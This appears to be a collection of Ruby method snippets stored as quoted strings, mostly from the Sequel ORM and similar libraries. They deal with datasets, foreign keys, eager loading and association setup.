"def initialize(dataset)\n opts = dataset.opts\n eager_graph = opts[:eager_graph]\n @master = eager_graph[:master]\n requirements = eager_graph[:requirements]\n reflection_map = @reflection_map = eager_graph[:reflections]\n reciprocal_map = @reciprocal_map = eager_graph[:reciprocals]\n limit_map = @limit_map = eager_graph[:limits]\n @unique = eager_graph[:cartesian_product_number] > 1\n \n alias_map = @alias_map = {}\n type_map = @type_map = {}\n after_load_map = @after_load_map = {}\n reflection_map.each do |k, v|\n alias_map[k] = v[:name]\n after_load_map[k] = v[:after_load] unless v[:after_load].empty?\n type_map[k] = if v.returns_array?\n true\n elsif (limit_and_offset = limit_map[k]) && !limit_and_offset.last.nil?\n :offset\n end\n end\n\n # Make dependency map hash out of requirements array for each association.\n # This builds a tree of dependencies that will be used for recursion\n # to ensure that all parts of the object graph are loaded into the\n # appropriate subordinate association.\n @dependency_map = {}\n # Sort the associations by requirements length, so that\n # requirements are added to the dependency hash before their\n # dependencies.\n requirements.sort_by{|a| a[1].length}.each do |ta, deps|\n if deps.empty?\n dependency_map[ta] = {}\n else\n deps = deps.dup\n hash = dependency_map[deps.shift]\n deps.each do |dep|\n hash = hash[dep]\n end\n hash[ta] = {}\n end\n end\n \n # This mapping is used to make sure that duplicate entries in the\n # result set are mapped to a single record. For example, using a\n # single one_to_many association with 10 associated records,\n # the main object column values appear in the object graph 10 times.\n # We map by primary key, if available, or by the object's entire values,\n # if not. The mapping must be per table, so create sub maps for each table\n # alias.\n records_map = {@master=>{}}\n alias_map.keys.each{|ta| records_map[ta] = {}}\n @records_map = records_map\n\n datasets = opts[:graph][:table_aliases].to_a.reject{|ta,ds| ds.nil?}\n column_aliases = opts[:graph_aliases] || opts[:graph][:column_aliases] # SEQUEL5: Remove :graph_aliases support\n primary_keys = {}\n column_maps = {}\n models = {}\n row_procs = {}\n datasets.each do |ta, ds|\n models[ta] = ds.model\n primary_keys[ta] = []\n column_maps[ta] = {}\n row_procs[ta] = ds.row_proc\n end\n column_aliases.each do |col_alias, tc|\n ta, column = tc\n column_maps[ta][col_alias] = column\n end\n column_maps.each do |ta, h|\n pk = models[ta].primary_key\n if pk.is_a?(Array)\n primary_keys[ta] = []\n h.select{|ca, c| primary_keys[ta] << ca if pk.include?(c)}\n else\n h.select{|ca, c| primary_keys[ta] = ca if pk == c}\n end\n end\n @column_maps = column_maps\n @primary_keys = primary_keys\n @row_procs = row_procs\n\n # For performance, create two special maps for the master table,\n # so you can skip a hash lookup.\n @master_column_map = column_maps[master]\n @master_primary_keys = primary_keys[master]\n\n # Add a special hash mapping table alias symbols to 5 element arrays that just\n # contain the data in other data structures for that table alias. This is\n # used for performance, to get all values in one hash lookup instead of\n # separate hash lookups for each data structure.\n ta_map = {}\n alias_map.keys.each do |ta|\n ta_map[ta] = [records_map[ta], row_procs[ta], alias_map[ta], type_map[ta], reciprocal_map[ta]]\n end\n @ta_map = ta_map\n end",
"def convert_input_dataset(ds)\n case ds\n when Symbol, SQL::Identifier, SQL::QualifiedIdentifier, SQL::AliasedExpression, LiteralString\n self.simple_table = db.literal(ds).freeze\n ds = db.from(ds)\n when Dataset\n if ds.joined_dataset?\n # raise Error, \"Using a joined dataset as a model dataset is not support, use from_self on the dataset to wrap it in a subquery\" # SEQUEL5\n Sequel::Deprecation.deprecate(\"Using a joined dataset as a Sequel::Model dataset\", respond_to?(:cti_base_model) ? \"Use the class_table_inheritance plugin :alias option in #{cti_base_model.inspect}\" : \"Call from_self on the dataset to wrap it in a subquery\")\n end\n\n self.simple_table = if ds.send(:simple_select_all?)\n ds.literal(ds.first_source_table).freeze\n end\n @db = ds.db\n else\n raise(Error, \"Model.set_dataset takes one of the following classes as an argument: Symbol, LiteralString, SQL::Identifier, SQL::QualifiedIdentifier, SQL::AliasedExpression, Dataset\")\n end\n\n set_dataset_row_proc(ds.clone(:model=>self))\n end",
"def set_dataset_rel_and_attr\n @dataset.database = @database\n @dataset_id = @dataset.id\n organization = Organization.find_by_id(@organization_id)\n organization.datasets << @dataset\n @dataset.organization = organization\n end",
"def create_datasets(builder)\n each_dataset(builder) do |ds|\n builder.create_dataset(ds, mapping: true, parents: ds.root?)\n end\n end",
"def foreign_key_list(table, opts=OPTS)\n m = output_identifier_meth\n fks = ado_schema_foreign_keys(table).inject({}) do |memo, fk|\n name = m.call(fk['FK_NAME'])\n specs = memo[name] ||= {\n :columns => [],\n :table => m.call(fk['PK_TABLE_NAME']),\n :key => [],\n :deferrable => fk['DEFERRABILITY'],\n :name => name,\n :on_delete => fk['DELETE_RULE'],\n :on_update => fk['UPDATE_RULE']\n }\n specs[:columns] << m.call(fk['FK_COLUMN_NAME'])\n specs[:key] << m.call(fk['PK_COLUMN_NAME'])\n memo\n end\n fks.values\n end",
"def build_embedded_model_lists(data)\n return false unless relations.include? :embed_many\n\n relations[:embed_many].each do |name, relation|\n value = if data.key? relation[:alias] then data[relation[:alias]]\n elsif data.key? name then data[name]\n else []\n end\n\n @embedded_model_lists[name] = ::Mandrake::EmbeddedModelList.new(relation[:model], value)\n end\n end",
"def convert_input_dataset(ds)\n case ds\n when Symbol, SQL::Identifier, SQL::QualifiedIdentifier, SQL::AliasedExpression, LiteralString\n self.simple_table = db.literal(ds).freeze\n ds = db.from(ds)\n when Dataset\n ds = ds.from_self(:alias=>ds.first_source) if ds.joined_dataset?\n\n self.simple_table = if ds.send(:simple_select_all?)\n ds.literal(ds.first_source_table).freeze\n end\n @db = ds.db\n else\n raise(Error, \"Model.set_dataset takes one of the following classes as an argument: Symbol, LiteralString, SQL::Identifier, SQL::QualifiedIdentifier, SQL::AliasedExpression, Dataset\")\n end\n\n set_dataset_row_proc(ds.clone(:model=>self))\n end",
"def dataset\n database[table_name]\n end",
"def foreign_key_list(table, opts=OPTS)\n m = output_identifier_meth\n schema, _ = opts.fetch(:schema, schema_and_table(table))\n\n h = {}\n fklod_map = FOREIGN_KEY_LIST_ON_DELETE_MAP \n reverse = opts[:reverse]\n\n (reverse ? _reverse_foreign_key_list_ds : _foreign_key_list_ds).where_each(Sequel[:cl][:oid]=>regclass_oid(table)) do |row|\n if reverse\n key = [row[:schema], row[:table], row[:name]]\n else\n key = row[:name]\n end\n\n if r = h[key]\n r[:columns] << m.call(row[:column])\n r[:key] << m.call(row[:refcolumn])\n else\n entry = h[key] = {\n :name=>m.call(row[:name]),\n :columns=>[m.call(row[:column])],\n :key=>[m.call(row[:refcolumn])],\n :on_update=>fklod_map[row[:on_update]],\n :on_delete=>fklod_map[row[:on_delete]],\n :deferrable=>row[:deferrable],\n :table=>schema ? SQL::QualifiedIdentifier.new(m.call(row[:schema]), m.call(row[:table])) : m.call(row[:table]),\n }\n\n unless schema\n # If not combining schema information into the :table entry\n # include it as a separate entry.\n entry[:schema] = m.call(row[:schema])\n end\n end\n end\n\n h.values\n end",
"def initialize_datasets\n @datasets = gateways.each_with_object({}) do |(key, gateway), h|\n h[key] = gateway.schema if config.gateways[key][:infer_relations]\n end\n end",
"def datasets\n ds = inclusively { dataset }\n [ds] + ds.descendants\n end",
"def load_dataset_structure(pid,dataset)\r\n @pid = pid\r\n GoodData.use @pid\r\n choosen_dataset = find_dataset(dataset)\r\n @dataset = GoodData::MdObject.new((GoodData.get choosen_dataset.uri)['dataSet'])\r\n\r\n #Load all atrribute info\r\n @dataset.content['attributes'].map do |e|\r\n att_id = e.match(\"[0-9]*$\").to_s\r\n @att[att_id] = Attribute.new((GoodData.get e)['attribute'])\r\n end\r\n\r\n #Load all fact info\r\n @dataset.content['facts'].map do |e|\r\n fact_id = e.match(\"[0-9]*$\").to_s\r\n @fact[fact_id] = Fact.new((GoodData.get e)['fact'])\r\n end\r\n end",
"def wrap_dataset(dataset)\n if relation.is_a?(Relation::Composite)\n relation.new(dataset).to_a\n else\n dataset\n end\n end",
"def creatables(include_references: nil); end",
"def dataset\n @dataset ||= generate_dataset\n end",
"def dataset_method\n :\"#{self[:name]}_dataset\"\n end",
"def dataset\n ds = Sequel::Dataset.new(self)\n end",
"def dataset\n ds = Sequel::Dataset.new(self)\n end",
"def build(data_set_name)\n raise Interfaces::DataSetAlreadyExists if interface(data_set_name).data_set_exists?\n build!(data_set_name)\n end",
"def build(attributes)\n if @parent.persisted?\n parent_foreign_key = @parent.class.demodulized_name.foreign_key.to_sym\n attributes[parent_foreign_key] = @parent.id\n end\n\n record = client.adapter_for(@class_name).build(attributes)\n @target << record\n record\n end",
"def dataset\n @dataset ||= data_maker.dataset\n end",
"def build(data_list)\n @models = []\n\n data_list.each do |data|\n @models << @klass.new(data)\n end\n end",
"def dataset_method\n :\"#{self[:name]}_dataset\"\n end",
"def foreign_key_list(table, opts=OPTS)\n super\n rescue Sequel::DatabaseError => e\n raise unless foreign_key_error?(e)\n []\n end",
"def dataset\n DB[SQL, from: from_truncated, to: to_truncated, tick: tick]\n end",
"def _dataset_method\n :\"_#{self[:name]}_dataset\"\n end",
"def _schema_ds\n @_schema_ds ||= begin\n ds = metadata_dataset.select{[\n pg_attribute[:attname].as(:name),\n SQL::Cast.new(pg_attribute[:atttypid], :integer).as(:oid),\n SQL::Cast.new(basetype[:oid], :integer).as(:base_oid),\n SQL::Function.new(:format_type, basetype[:oid], pg_type[:typtypmod]).as(:db_base_type),\n SQL::Function.new(:format_type, pg_type[:oid], pg_attribute[:atttypmod]).as(:db_type),\n SQL::Function.new(:pg_get_expr, pg_attrdef[:adbin], pg_class[:oid]).as(:default),\n SQL::BooleanExpression.new(:NOT, pg_attribute[:attnotnull]).as(:allow_null),\n SQL::Function.new(:COALESCE, SQL::BooleanExpression.from_value_pairs(pg_attribute[:attnum] => SQL::Function.new(:ANY, pg_index[:indkey])), false).as(:primary_key),\n Sequel[:pg_type][:typtype],\n (~Sequel[Sequel[:elementtype][:oid]=>nil]).as(:is_array),\n ]}.\n from(:pg_class).\n join(:pg_attribute, :attrelid=>:oid).\n join(:pg_type, :oid=>:atttypid).\n left_outer_join(Sequel[:pg_type].as(:basetype), :oid=>:typbasetype).\n left_outer_join(Sequel[:pg_type].as(:elementtype), :typarray=>Sequel[:pg_type][:oid]).\n left_outer_join(:pg_attrdef, :adrelid=>Sequel[:pg_class][:oid], :adnum=>Sequel[:pg_attribute][:attnum]).\n left_outer_join(:pg_index, :indrelid=>Sequel[:pg_class][:oid], :indisprimary=>true).\n where{{pg_attribute[:attisdropped]=>false}}.\n where{pg_attribute[:attnum] > 0}.\n order{pg_attribute[:attnum]}\n\n # :nocov:\n if server_version > 100000\n # :nocov:\n ds = ds.select_append{pg_attribute[:attidentity]}\n\n # :nocov:\n if server_version > 120000\n # :nocov:\n ds = ds.select_append{Sequel.~(pg_attribute[:attgenerated]=>'').as(:generated)}\n end\n end\n\n ds\n end\n end",
"def _associated_dataset\n associated_class.dataset.clone\n end",
"def dataset\n @dataset ||= begin\n create_table!\n database[:data_stores]\n end\n end",
"def schema_ds_dataset\n schema_utility_dataset\n end",
"def def_one_to_many(opts)\n one_to_one = opts[:type] == :one_to_one\n name = opts[:name]\n key = (opts[:key] ||= opts.default_key)\n km = opts[:key_method] ||= opts[:key]\n cks = opts[:keys] = Array(key)\n opts[:key_methods] = Array(opts[:key_method])\n primary_key = (opts[:primary_key] ||= self.primary_key)\n opts[:eager_loader_key] = primary_key unless opts.has_key?(:eager_loader_key)\n cpks = opts[:primary_keys] = Array(primary_key)\n pkc = opts[:primary_key_column] ||= primary_key\n pkcs = opts[:primary_key_columns] ||= Array(pkc)\n raise(Error, \"mismatched number of keys: #{cks.inspect} vs #{cpks.inspect}\") unless cks.length == cpks.length\n uses_cks = opts[:uses_composite_keys] = cks.length > 1\n opts[:dataset] ||= opts.association_dataset_proc\n opts[:eager_loader] ||= proc do |eo|\n h = eo[:id_map]\n reciprocal = opts.reciprocal\n assign_singular = opts.assign_singular?\n delete_rn = opts.delete_row_number_column\n\n eager_load_results(opts, eo) do |assoc_record|\n assoc_record.values.delete(delete_rn) if delete_rn\n hash_key = uses_cks ? km.map{|k| assoc_record.get_column_value(k)} : assoc_record.get_column_value(km)\n next unless objects = h[hash_key]\n if assign_singular\n objects.each do |object| \n unless object.associations[name]\n object.associations[name] = assoc_record\n assoc_record.associations[reciprocal] = object if reciprocal\n end\n end\n else\n objects.each do |object| \n object.associations[name].push(assoc_record)\n assoc_record.associations[reciprocal] = object if reciprocal\n end\n end\n end\n end\n \n join_type = opts[:graph_join_type]\n select = opts[:graph_select]\n use_only_conditions = opts.include?(:graph_only_conditions)\n only_conditions = opts[:graph_only_conditions]\n conditions = opts[:graph_conditions]\n opts[:cartesian_product_number] ||= one_to_one ? 0 : 1\n graph_block = opts[:graph_block]\n opts[:eager_grapher] ||= proc do |eo|\n ds = eo[:self]\n ds = ds.graph(opts.apply_eager_graph_limit_strategy(eo[:limit_strategy], eager_graph_dataset(opts, eo)), use_only_conditions ? only_conditions : cks.zip(pkcs) + conditions, Hash[eo].merge!(:select=>select, :join_type=>eo[:join_type]||join_type, :qualify=>:deep, :from_self_alias=>eo[:from_self_alias]), &graph_block)\n # We only load reciprocals for one_to_many associations, as other reciprocals don't make sense\n ds.opts[:eager_graph][:reciprocals][eo[:table_alias]] = opts.reciprocal\n ds\n end\n \n return if opts[:read_only]\n\n save_opts = {:validate=>opts[:validate]}\n ck_nil_hash ={}\n cks.each{|k| ck_nil_hash[k] = nil}\n\n if one_to_one\n opts[:setter] ||= proc do |o|\n up_ds = _apply_association_options(opts, opts.associated_dataset.where(cks.zip(cpks.map{|k| get_column_value(k)})))\n if o\n up_ds = up_ds.exclude(o.pk_hash) unless o.new?\n cks.zip(cpks).each{|k, pk| o.set_column_value(:\"#{k}=\", get_column_value(pk))}\n end\n checked_transaction do\n up_ds.skip_limit_check.update(ck_nil_hash)\n o.save(save_opts) || raise(Sequel::Error, \"invalid associated object, cannot save\") if o\n end\n end\n opts[:_setter] = proc{|o| set_one_to_one_associated_object(opts, o)}\n else \n save_opts[:raise_on_failure] = opts[:raise_on_save_failure] != false\n\n opts[:adder] ||= proc do |o|\n cks.zip(cpks).each{|k, pk| o.set_column_value(:\"#{k}=\", get_column_value(pk))}\n o.save(save_opts)\n end\n \n opts[:remover] ||= proc do |o|\n cks.each{|k| o.set_column_value(:\"#{k}=\", nil)}\n o.save(save_opts)\n end\n\n opts[:clearer] ||= proc do\n _apply_association_options(opts, opts.associated_dataset.where(cks.zip(cpks.map{|k| get_column_value(k)}))).update(ck_nil_hash)\n end\n end\n end",
"def to_maql_create\n maql = \"# Create the '#{self.title}' data set\\n\"\n maql += \"CREATE DATASET {#{self.identifier}} VISUAL (TITLE \\\"#{self.title}\\\");\\n\\n\"\n [ attributes, facts, { 1 => @connection_point } ].each do |objects|\n objects.values.each do |obj|\n maql += \"# Create '#{obj.title}' and add it to the '#{self.title}' data set.\\n\"\n maql += obj.to_maql_create\n maql += \"ALTER DATASET {#{self.identifier}} ADD {#{obj.identifier}};\\n\\n\"\n end\n end\n\n labels.each do |label|\n maql += \"# Creating Labels\\n\"\n maql += label.to_maql_create\n end\n\n references.values.each do |ref|\n maql += \"# Creating references\\n\"\n maql += ref.to_maql_create\n end\n\n folders_maql = \"# Create folders\\n\"\n (folders[:attributes].values + folders[:facts].values).each { |folder| folders_maql += folder.to_maql_create }\n folders_maql + \"\\n\" + maql + \"SYNCHRONIZE {#{identifier}};\\n\"\n end",
"def source_data_set\n get :data_set, PublicEarth::Db::DataSet.for_anonymous(@ip_address, get(:tracking_id, UUIDTools::UUID.random_create.to_s))\n end",
"def data_for_serialize\n da=DAData.new @root\n [@words.build,da.base,da.check]\n end",
"def datasets\n datasets = []\n dataset.each do |d|\n if d[:data].first.is_a?(Array)\n datasets += d[:data]\n else\n datasets << d[:data]\n end\n end\n datasets\n end",
"def dataset\n self\n end",
"def dataset\n self\n end",
"def dataset\n self\n end",
"def selection_data\n dataset ||= DB[:selections]\n end",
"def _metadata_dataset\n super.\n with_identifier_input_method(identifier_input_method_default).\n with_identifier_output_method(identifier_output_method_default)\n end",
"def foreign_keys\n vals = []\n foreign_key_fields.each do |field|\n vals << self.send(field)\n end\n vals\n end",
"def prepare_identities_from_data; end",
"def build_keys(data)\n # List of keys with defaults to process after the rest of the\n # data has been loaded\n post_process_keys = []\n\n key_objects.each do |name, key|\n attribute_value = if data.key? key.alias then data[key.alias] # Should be stored under the alias...\n elsif data.key? name then data[name] # ...but may be stored under the full name\n else # new key - set to default\n if key.default.respond_to?(:call) # It's a Proc - deal with it later\n post_process_keys << name\n nil\n else key.default\n end\n end\n\n @attribute_objects[name] = key.create_attribute(attribute_value)\n end\n\n post_process_defaults(post_process_keys)\n end",
"def children_table; end",
"def _join_table_dataset(opts)\n ds = model.db.from(opts.join_table_source)\n opts[:join_table_block] ? opts[:join_table_block].call(ds) : ds\n end",
"def __column_data__\n ColumnData.new(@columns, @primary_keys, @to_avoid, @default_values, @associations)\n end",
"def set_datasets\n @datasets = current_user.get_datasets 'all'\n\n @metadata_array = []\n @metadata_array = Dataset.get_metadata_list(@datasets.map{|ds| ds.id}) if @datasets\n\n # TODO: Find a better way to do this\n @datasets.each_with_index do |ds, i|\n ds.metadata = @metadata_array['data'][i]['attributes']\n end\n end",
"def construct_join_attributes(*records)\n if @reflection.source_reflection.macro != :belongs_to\n raise HasManyThroughCantAssociateThroughHasOneOrManyReflection.new(@owner, @reflection)\n end\n\n join_attributes = {\n @reflection.source_reflection.foreign_key =>\n records.map { |record|\n record.send(@reflection.source_reflection.association_primary_key)\n }\n }\n\n if @reflection.options[:source_type]\n join_attributes[@reflection.source_reflection.foreign_type] =\n records.map { |record| record.class.base_class.name }\n end\n\n if records.count == 1\n Hash[join_attributes.map { |k, v| [k, v.first] }]\n else\n join_attributes\n end\n end",
"def eager_loading_dataset(eo=OPTS)\n ds = eo[:dataset] || associated_eager_dataset\n if id_map = eo[:id_map]\n ds = ds.where(eager_loading_predicate_condition(id_map.keys))\n end\n if associations = eo[:associations]\n ds = ds.eager(associations)\n end\n if block = eo[:eager_block]\n ds = block.call(ds)\n end\n if eager_loading_use_associated_key?\n ds = ds.select_append(*associated_key_array)\n end\n if self[:eager_graph]\n raise(Error, \"cannot eagerly load a #{self[:type]} association that uses :eager_graph\") if eager_loading_use_associated_key?\n ds = ds.eager_graph(self[:eager_graph])\n end\n ds\n end",
"def dataset\n @dataset_class.new(self)\n end",
"def data_attributes\n @schema.schema.select {|k,_| k.to_s.start_with?('data_') or k.to_s.start_with?('data-')}.inject({}) {|col,(k,v)| col[k[5..-1].to_sym]=v;col}\n end",
"def find_recursive_datasets(datasets)\n all_datasets = datasets['included'] + datasets['excluded']\n single = []\n recursive = []\n cleaned_recursive = []\n\n ### Find datasets that must be single, or are eligible for recursive\n datasets['included'].each do |dataset|\n excluded_child = false\n # Find all children_datasets\n children_datasets = all_datasets.select { |child_dataset| child_dataset.name.start_with? dataset.name }\n children_datasets.each do |child_dataset|\n if datasets['excluded'].include?(child_dataset)\n excluded_child = true\n single << dataset\n break\n end\n end\n unless excluded_child\n recursive << dataset\n end\n end\n\n ## Cleanup recursive\n recursive.each do |dataset|\n if dataset.name.include?('/')\n parts = dataset.name.rpartition('/')\n parent = all_datasets.find { |parent_dataset| parent_dataset.name == parts[0] }\n else\n parent = dataset\n end\n\n # Parent dataset\n if parent == dataset\n cleaned_recursive << dataset\n next\n end\n\n # Only add this if its parent is not in the recursive list\n cleaned_recursive << dataset unless recursive.include?(parent)\n end\n\n # If any children have a DB, need to set it in the recursive parent\n cleaned_recursive.each do |parent|\n all_datasets.each do |dataset|\n # Is this dataset a child of the parent?\n next if !dataset.name.include?(parent.name)\n # If this dataset has a DB, set the parent to contain it as well.\n if dataset.db\n parent.contains_db!(dataset.db)\n end\n end\n end\n\n\n {\n 'single' => single,\n 'recursive' => cleaned_recursive,\n 'included' => datasets['included'],\n 'excluded' => datasets['excluded'],\n }\nend",
"def create_data\n @entities_total.times do |i|\n @data << entity_class.new(i, self)\n end\n end",
"def reflection_to_foreign_keys!( reflection, foreign_key_list )\n reflection_to_foreign_keys( reflection ).each do |foreign_key|\n #skip if already in this list or the fk has already been uped in the db\n next if includes_foreign_key?( foreign_key, foreign_key_list ) ||\n existing_foreign_key?( foreign_key )\n foreign_key_list << foreign_key\n end\n end",
"def extract_dbc_data\n tabledata = {}\n\n curt = nil\n @db.each do |r|\n unless r.nil?\n if r.objecttype == \"Table\"\n # This is a related table\n tabledata[r.objectid] = {name: r.objectname, fields: []}\n elsif r.objecttype == \"Field\"\n # This is a related field. The parentid points to the table object\n\n # create using the parentid if the parentid is still unknown.\n tabledata[r.parentid] = {name: \"UNKNOWN\", fields: []} unless tabledata.has_key?(r.parentid)\n tabledata[r.parentid][:fields] << r.objectname\n end\n end\n end\n\n # now we need to transform the resulting array-hash to a direct mapping (changed to support older Ruby versions)\n # { tablename => [fieldnames] }\n @tables = {}\n tabledata.each{|k, v| @tables[v[:name]] = v[:fields] }\n end",
"def foreign_keys(*partition_key_values)\n return collect_from_collection(*partition_key_values, &:foreign_keys).inject(Set.new) do |set,new_items|\n if new_items.is_a? Array\n set += new_items\n else\n set += [new_items]\n end\n set\n end\n end",
"def get_dataset(table)\n #puts \"converting to a dataset\"\n to_dataset(@datafiles[table].content)\n end",
"def data_objects(project_id, collection_id)\n ::Syncano::QueryBuilder.new(self, ::Syncano::Resources::DataObject, project_id: project_id, collection_id: collection_id)\n end",
"def data_sets\n update\n library.values\n end",
"def flatten!\n self.class.attributes.keys.select { |k| k.end_with?('_data') }.each do |data_attr|\n reference_attr = data_attr[/(.+?)_data$/, 1]\n value = send(data_attr)\n next if value.nil?\n\n send(\"#{data_attr}=\", value)\n send(\"#{reference_attr})\", nil)\n end\n\n self\n end",
"def build_embedded_models(data)\n return false unless relations.include? :embed_one\n\n relations[:embed_one].each do |name, relation|\n value = if data.key? relation[:alias] then data[relation[:alias]]\n elsif data.key? name then data[name]\n else nil\n end\n\n @embedded_models[name] = ::Mandrake::EmbeddedModel.new(relation[:model], value)\n end\n end",
"def setup_columns\n if inheritable?\n SimpleSet.new([primary_key, inheritance_column])\n else\n primary_key.blank? ? SimpleSet.new : SimpleSet.new([primary_key])\n end \n end",
"def dataset(name)\n fetch_or_store(name) { Dataset.new(rql.table(name), rql, self) }\n end",
"def data_model\n @data_model ||= items.each_with_object(Hash.new {|h,k| h[k] = [] }) do |item, result|\n result[get_user_mapped_id(item.user_id)] << [get_item_mapped_id(item.item_id), item.interest_score]\n end\n end",
"def def_many_to_one(opts)\n name = opts[:name]\n opts[:key] = opts.default_key unless opts.has_key?(:key)\n key = opts[:key]\n opts[:eager_loader_key] = key unless opts.has_key?(:eager_loader_key)\n cks = opts[:graph_keys] = opts[:keys] = Array(key)\n opts[:key_column] ||= key\n opts[:graph_keys] = opts[:key_columns] = Array(opts[:key_column])\n opts[:qualified_key] = opts.qualify_cur(key)\n if opts[:primary_key]\n cpks = Array(opts[:primary_key])\n raise(Error, \"mismatched number of keys: #{cks.inspect} vs #{cpks.inspect}\") unless cks.length == cpks.length\n end\n uses_cks = opts[:uses_composite_keys] = cks.length > 1\n opts[:cartesian_product_number] ||= 0\n\n if !opts.has_key?(:many_to_one_pk_lookup) &&\n (opts[:dataset] || opts[:conditions] || opts[:block] || opts[:select] ||\n (opts.has_key?(:key) && opts[:key] == nil))\n opts[:many_to_one_pk_lookup] = false\n end\n auto_assocs = @autoreloading_associations\n cks.each do |k|\n (auto_assocs[k] ||= []) << name\n end\n\n opts[:dataset] ||= opts.association_dataset_proc\n opts[:eager_loader] ||= proc do |eo|\n h = eo[:id_map]\n pk_meths = opts.primary_key_methods\n\n eager_load_results(opts, eo) do |assoc_record|\n hash_key = uses_cks ? pk_meths.map{|k| assoc_record.get_column_value(k)} : assoc_record.get_column_value(opts.primary_key_method)\n if objects = h[hash_key]\n objects.each{|object| object.associations[name] = assoc_record}\n end\n end\n end\n \n join_type = opts[:graph_join_type]\n select = opts[:graph_select]\n use_only_conditions = opts.include?(:graph_only_conditions)\n only_conditions = opts[:graph_only_conditions]\n conditions = opts[:graph_conditions]\n graph_block = opts[:graph_block]\n graph_cks = opts[:graph_keys]\n opts[:eager_grapher] ||= proc do |eo|\n ds = eo[:self]\n ds.graph(eager_graph_dataset(opts, eo), use_only_conditions ? only_conditions : opts.primary_keys.zip(graph_cks) + conditions, Hash[eo].merge!(:select=>select, :join_type=>eo[:join_type]||join_type, :qualify=>:deep, :from_self_alias=>eo[:from_self_alias]), &graph_block)\n end\n \n return if opts[:read_only]\n \n opts[:setter] ||= proc{|o| cks.zip(opts.primary_key_methods).each{|k, pk| set_column_value(:\"#{k}=\", (o.get_column_value(pk) if o))}}\n opts[:_setter] = proc{|o| set_associated_object(opts, o)}\n end",
"def idols_data\n\n\t\t[[ \"Last name\", \"First name\", \"Description\" ]] + [[ @view_context.number_to_currency(1), 2, 3] ] +\n\t\t@idols.map { |idol| [idol.last_name, idol.first_name, idol.talents.first.description] }\n\n\tend",
"def association_dataset_for(object)\n condition = if can_have_associated_objects?(object)\n predicate_keys.zip(predicate_key_values(object))\n else\n false\n end\n\n associated_dataset.where(condition)\n end",
"def generate_dc_job_data\n @job_data[\"name\"] = @name if @name\n @row_hash[\"source\"] = @row_hash[\"dc_source\"]\n @row_hash.delete(\"dc_source\")\n @job_data = @source.fetch_source_data(nil, @row_hash)\n end",
"def to_json\n hash = {}\n hash['dataSetName'] = dataset_name\n if column_metadata.nil? == false\n hash['columns'] = {}\n column_metadata.each do |column|\n hash['columns'].merge!(column.to_hash)\n end\n end\n hash['joins'] = []\n joins.each do |join|\n hash['joins'] << join.to_hash\n end\n hash.to_json\n end",
"def initialize\n @columns = { }\n @primary_keys = []\n @to_avoid = []\n @default_values = { }\n @associations = \n {\n :belongs_to => { },\n :has_one => { },\n :has_n => { }\n }\n end",
"def source_data_set\n @data_set ||= PublicEarth::Db::DataSet.for_user(self)\n end",
"def make\n if dimension?\n dimension_key_builder\n elsif fact?\n FactKeyBuilder.new(staging_db[table.table_name])\n end\n end",
"def fk_join_arr\n result = []\n groups.each_with_index do |group, idx|\n group_alias = \"#{group.parent_table}_#{idx}\"\n group_query = group_query_builder(group)\n result.push \"JOIN (\\n#{group_query}\\n\\t) AS #{group_alias}_fk\"\n result.push \"ON #{group_alias}_fk.#{FKEYS[group.parent_table]}=#{group.parent_table}.#{group.parent_table_pk}\"\n if idx > 0\n groups.each_with_index do |x_group, x_idx|\n #next if x_idx < idx\n x_group_alias = \"#{x_group.parent_table}_#{x_idx}\"\n result.push \"\\tAND #{x_group_alias}_fk.year = #{group_alias}_fk.year\"\n break\n end\n end\n end\n return result\n end",
"def add_piggy_back_sql_data!(reflection_name, prefix, table_alias, attributes, select, joins, conditions, join_type)\n ktn = table_name\n kpkey = primary_key\n reflection = reflections[reflection_name]\n atn = reflection.table_name\n attributes.each do |attr|\n if table_alias\n select << \", #{table_alias}.#{attr} AS #{prefix}_#{attr}\"\n else\n select << \", #{atn}.#{attr} AS #{prefix}_#{attr}\"\n end\n end\n fkey = reflection.primary_key_name\n fpkey = reflection.klass.primary_key\n\n case reflection.macro\n when :belongs_to\n if table_alias\n joins << \" #{join_type} JOIN #{atn} #{table_alias} ON #{table_alias}.#{fpkey}=#{ktn}.#{fkey} \"\n else\n joins << \" #{join_type} JOIN #{atn} ON #{atn}.#{fpkey}=#{ktn}.#{fkey} \"\n end\n when :has_one\n if table_alias\n joins << \" #{join_type} JOIN #{atn} #{table_alias} ON #{table_alias}.#{fkey}=#{ktn}.#{kpkey} \"\n else\n joins << \" #{join_type} JOIN #{atn} ON #{atn}.#{fkey}=#{ktn}.#{kpkey} \"\n end\n when :has_many\n raise \"piggy_back: aliasing not implemented for has_many\" if table_alias\n if reflection.options[:through]\n ttn = reflection.through_reflection.klass.table_name\n tkfkey = reflection.through_reflection.primary_key_name\n tafkey = reflection.source_reflection.primary_key_name\n\n through_conditions = reflection.options[:conditions] ?\n \" AND \" + reflection.options[:conditions] : \"\"\n source_conditions = reflection.through_reflection.options[:conditions] ?\n \" AND \" + reflection.through_reflection.options[:conditions] : \"\"\n\n joins << \" LEFT JOIN #{ttn} ON (#{ttn}.#{tkfkey}=#{ktn}.#{kpkey}#{through_conditions})\"\n joins << \" LEFT JOIN #{atn} ON (#{ttn}.#{tafkey}=#{atn}.#{fpkey}#{source_conditions}) \"\n else\n reflection_conditions = reflection.options[:conditions] ?\n \" AND \" + reflection.options[:conditions] : \"\"\n\n joins << \" LEFT JOIN #{atn} ON (#{atn}.#{fkey}=#{ktn}.#{kpkey}#{reflection_conditions}) \"\n end\n else\n raise \"can't piggy back #{reflection.macro} on class #{klass}\"\n end\n end",
"def _select_serial_sequence_ds\n @_serial_sequence_ds ||= metadata_dataset.\n from{[\n pg_class.as(:seq),\n pg_attribute.as(:attr),\n pg_depend.as(:dep),\n pg_namespace.as(:name),\n pg_constraint.as(:cons),\n pg_class.as(:t)\n ]}.\n where{[\n [seq[:oid], dep[:objid]],\n [seq[:relnamespace], name[:oid]],\n [seq[:relkind], 'S'],\n [attr[:attrelid], dep[:refobjid]],\n [attr[:attnum], dep[:refobjsubid]],\n [attr[:attrelid], cons[:conrelid]],\n [attr[:attnum], cons[:conkey].sql_subscript(1)],\n [attr[:attrelid], t[:oid]],\n [cons[:contype], 'p']\n ]}.\n select{[\n name[:nspname].as(:schema),\n seq[:relname].as(:sequence)\n ]}\n end",
"def data_matrix_all(coll, data_matrix)\n pas = coll.part_associations\n part_ids = pas.collect(&:part_id)\n das = DataAssociation.where(parent_class: 'Item', parent_id: part_ids)\n pas.each do |pa|\n data_matrix[pa.row][pa.column] = {}\n das.select { |da| da.parent_id == pa.part_id }.each do |da|\n data_matrix[pa.row][pa.column][da.key] = da.value\n end\n end\n data_matrix\n end",
